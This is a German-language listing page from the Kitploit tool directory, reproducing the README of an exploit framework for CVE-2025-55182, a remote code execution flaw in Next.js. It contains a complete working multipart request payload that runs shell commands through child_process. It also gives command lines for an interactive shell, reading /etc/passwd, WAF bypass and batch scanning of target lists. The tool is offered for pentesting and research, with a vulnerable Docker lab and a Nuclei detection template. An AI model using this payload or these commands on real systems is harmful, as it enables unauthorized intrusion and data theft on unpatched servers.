Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell-exploit — React2Shell-Exploit — Vollständiges Exploit-Framework für CVE-2025-55182, einschließlich Python-Exploit, verwundbarem Docker-Labor, manueller und automatisierter Exploitation mit Burp Suite, Nuclei-Erkennungstemplate und validiertem Testworkflow. Entwickelt für Penetrationstests und zu Bildungs- und Forschungszwecken. | Kitploit
Tools/GitHubGitHub/rubensuxo-eh/react2shell-exploit
SchwachstellenscannerExploit-FrameworksWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and ControlLernen & BildungPayload-EntwicklungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

React2Shell-Exploit — Vollständiges Exploit-Framework für CVE-2025-55182, einschließlich Python-Exploit, verwundbarem Docker-Labor, manueller und automatisierter Exploitation mit Burp Suite, Nuclei-Erkennungstemplate und validiertem Testworkflow. Entwickelt für Penetrationstests und zu Bildungs- und Forschungszwecken.

GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

Repository anzeigen
41vor 8 MonatenNoch nicht geprüft
Teilen

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 – Next.js RCE Remote Code Execution

Exploit-Framework + verwundbares Labor + Burp Suite & Nuclei-Validierung.

Vollständiges Exploitation-Framework und verwundbare Laborumgebung für Sicherheitsforschung und Penetrationstests.

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 Übersicht

React2Shell-Exploit-Kensei ist ein umfassendes Toolkit zur Ausnutzung von CVE-2025-55182, einer kritischen Remote-Code-Execution-Schwachstelle in Next.js-Anwendungen.

Es enthält:

  • 🐍 Python-Exploit (automatische + manuelle Modi)
  • 🐳 Verwundbares Docker-Labor (Next.js 16.0.6)
  • 🔥 Burp-Suite-Exploitation-Vorlagen
  • 🚨 Nuclei-Erkennungsvorlage
  • 🧪 Validierte Testfälle

Betroffene Versionen:

  • Next.js < 16.0.7
  • React 19.0.0

CVSS-Score: 10.0 (Kritisch)

✨ Funktionen

🔨 Exploitation

✅ Automatisierte Exploitation
✅ Interaktive Shell
✅ Befehlsausführung
✅ Dateilesen
✅ WAF-Bypass
✅ Batch-Scanning

🧪 Laborumgebung – Docker-Installation – Voraussetzungen

Docker muss installiert sein, um das verwundbare Labor auszuführen.

PlattformInstallationslink
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linux

Installation überprüfen:

root@kitploit:~
docker --version

📖 Dokumentation

✅ Burp-Suite-Anleitung
✅ Nuclei-Vorlage
✅ Vollständige Beispiele


🚀 Schnellstart

root@kitploit:~
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 Verwendungsbeispiele

Scan

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --scan

Befehl ausführen

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "id"

Interaktive Shell

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --shell

Datei lesen

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

WAF-Bypass

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

Batch-Scan

root@kitploit:~
python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 Manuelle Exploitation

Burp Suite

Verifiziert funktionsfähig – Request-Vorlage:

root@kitploit:~
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Erwartete Antwort:

root@kitploit:~
"children":["__PAGE__?{\"out\":\"root\"}",{}]

Manuelles Testen von WHOAMI: Mein Screenshot

Manuelles Testen von IFCONFIG: Mein Screenshot

Alternative automatisierte Erkennungsmethoden:

  • ✅ Extensibility-Helper-Erweiterung:
    1. Gehe zu Erweiterungen:
    2. Installiere „Extensibility Helper“ und öffne ihn

Mein Screenshot

  1. Gehe zum „Bambda Store“
  2. Suche nach „CVE-2025-55182,CVE-2025-66478 - React2Shell“

Mein Screenshot

  1. Klicke auf „import“

Mein Screenshot

  1. Führe „Audit Selected Items“ aus

Mein Screenshot

Mein Screenshot

Mein Screenshot

  1. Überprüfe im Custom-Tab, dass „CVE-2025-55182,CVE-2025-66478 - React2Shell“ ausgewählt ist Mein Screenshot
  • ✅ ActiveScan++: Automatische Erkennung

Mein Screenshot

Nuclei

Verifiziert funktionsfähig:

root@kitploit:~
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

Ausgabe:

root@kitploit:~
[CVE-2025-55182] [http] [critical] http://target.com:3002/

Mein Screenshot

🐺 Danksagungen

Autor: Ruben Suxo – Ethical Hacker (kensei)
Version: 2.5.0
Datum: 2025-12-06

Forschung & Inspiration

Dieses Projekt basiert auf Forschung und Techniken von:

  • assetnote/react2shell-scanner – Scanner-Implementierung
  • freeqaz/react2shell – Exploitation-Techniken
  • whiteov3rflow/CVE-2025-55182-poc – Proof of Concept

Schwachstellenentdeckung

  • Lachlan Davidson (@lachlan2k) – Ursprüngliche Entdeckung von CVE-2025-55182

⚠️ Rechtlicher Haftungsausschluss

Nur für autorisierte Sicherheitstests.

Unbefugter Zugriff ist illegal. Verwende es nur auf Systemen, die dir gehören oder für die du eine ausdrückliche Genehmigung zum Testen hast.


📄 Lizenz

MIT-Lizenz


🐺 Hack The Planet – Verantwortungsvoll

Nur für Bildungszwecke. Ethisch verwenden.

Tool herunterladen
https://docs.docker.com/engine/install/